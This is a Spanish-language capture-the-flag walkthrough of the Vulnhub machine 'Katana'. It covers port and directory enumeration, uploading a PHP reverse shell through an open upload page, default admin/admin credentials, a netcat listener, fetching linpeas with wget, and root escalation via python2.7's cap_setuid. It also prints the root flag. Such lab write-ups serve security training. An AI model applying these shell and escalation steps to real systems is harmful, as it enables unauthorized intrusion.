[VLN] Katana

Hoy vamos a hackear la maquina de Vulnhub llamada Katana. Podeis descargarla desde el siguiente enlace: Katana

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 17:26 CEST
Nmap scan report for katana.home (192.168.1.119)
Host is up (0.0011s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
|   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after:  2022-05-11T13:57:36
|_ssl-date: 2020-05-16T15:26:44+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: KATANA, NetBIOS user: , NetBIOS MAC:  
(unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: katana
|   NetBIOS computer name: KATANA\x00
|   Domain name: \x00
|   FQDN: katana
|_  System time: 2020-05-16T11:26:41-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-16T15:26:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.89 seconds
Vemos que tiene varios puertos abiertos, tras investigar, profundizamos en el puerto 8088 a ver si encontramos algo interesante.

sml@m0nique:~$ gobuster dir -u http://192.168.112.129:8088 -w 
/usr/share/wordlists/dirb/big.txt -x txt,php,html                               
                       
===============================================================                 
                                                                                
     
Gobuster v3.0.1                                                                 
                                                                                
     
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)                 
                                                                                
     
===============================================================                 
                                                                                
     
[+] Url:            http://192.168.112.129:8088                                 
                                                                                
     
[+] Threads:        10                                                          
                                                                                
     
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt                           
                                                                                
     
[+] Status codes:   200,204,301,302,307,401,403                                 
                                                                                
     
[+] User Agent:     gobuster/3.0.1                                              
                                                                                
     
[+] Extensions:     txt,php,html                                                
                                                                                
     
[+] Timeout:        10s                                                         
                                                                                
     
===============================================================                 
                                                                                
     
2020/05/22 23:03:06 Starting gobuster                                           
                                                                                
     
===============================================================                 
                                                                                
     
/.htaccess (Status: 403)
/blocked (Status: 301)
/cgi-bin (Status: 301)
/css (Status: 301)
/docs (Status: 301)
/error404.html (Status: 200)
/img (Status: 301)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/protected (Status: 301)
/upload.php (Status: 200)
/upload.html (Status: 200)
===============================================================
2020/05/22 23:03:12 Finished
===============================================================
Vemos que aparece una pagina llamada upload.html, la cual resulta interesante. Tras verla, nos permite subir ficheros. Al subir los ficheros los renombra. Si luego usamos gobuster para buscar el nombre del nuevo fichero vemos que lo tenemos en http://192.168.112.129:8715/.

Exploitation


En http://192.168.112.129:8715/ nos tenemos que loguear previamente usando admin/admin :) Asi que sabiendo esto, preparamos nuestra reverse-shell y la editamos para que apunte hacia nuestra maquina.

sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php  .
sml@m0nique:~$ mv php-reverse-shell.php shelli.php
sml@m0nique:~$ nano shelli.php
La subimos a: http://192.168.112.129:8088/upload.html El resultado que nos da es:

File : file1
Name : reshell.php
Type : application/x-php
Path : /tmp/phpJMsNlv
Size : 5494
Please wait for 1 minute!. Please relax!.

Moved: /tmp/phpJMsNlv ====> /opt/manager/html/katana_shelli.php
MD5 : ad5545baba3150a5e5339ab720777fd4
Size : 5494 bytes
Vemos que ha renombrado nuestra reverse shell a katana_shelli.php. Ponemos nc a la escucha en nuestra maquina.

sml@m0nique:~$ nc -nlvp 4444
Y por ultimo visitamos http://192.168.112.129:8715/katana_reshell.php (Acordaros que antes que "visitar" vuestra shell hay que entrar en http://192.168.112.129:8715 y loguearos admin/admin).

Low Shell



sml@m0nique:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.129] 36014
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 
GNU/Linux
 05:04:56 up 14 min,  0 users,  load average: 0.05, 0.08, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Estamos dentro, ahora exploramos el sistema :)

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ cd /home
$ ls
katana
$ cd katana
$ ls -la
total 32
drwxr-xr-x 4 katana katana 4096 May 21 05:04 .
drwxr-xr-x 3 root   root   4096 May 11 09:33 ..
-rw-r--r-- 1 katana katana  220 May 11 09:33 .bash_logout
-rw-r--r-- 1 katana katana 3526 May 11 09:33 .bashrc
drwx------ 3 katana katana 4096 May 11 11:57 .gnupg
-rw-r--r-- 1 katana katana  807 May 11 09:33 .profile
drwxrwxrwx 2 katana katana 4096 May 16 15:28 .ssh
-rw-r--r-- 1 root   root     19 May 11 11:52 .ssh_passwd
$ cat .ssh_passwd
katana@katana12345
Parece la password del usuario katana, probamos...

$ su katana
Password: katana12345
python -c 'import pty; pty.spawn("/bin/sh")'
$ 
Ahora que estamos como usuario "katana" nos descargamos linpeas.sh desde nuestra maquina para explorar mas en detalle el sistema y ver como podemos escalar los privilegios.

$cd /tmp
$ wget http://192.168.112.128/linpeas.sh
$ sh linpeas.sh
De la salida de linpeas, la parte que nos interesa es:

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities    
                                                            
/usr/bin/ping = cap_net_raw+ep                                        
/usr/bin/python2.7 = cap_setuid+ep
Vemos que python2.7 tiene cap_setuid, lo que nos permitira escalar privilegios...

Privilege Escalation



$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1000(katana) 
groups=1000(katana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
,109(netdev)

root.txt



# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt  
cat root.txt
{R00t_key_Katana_91!}

End


Y con esto ya seriamos root de la maquina :)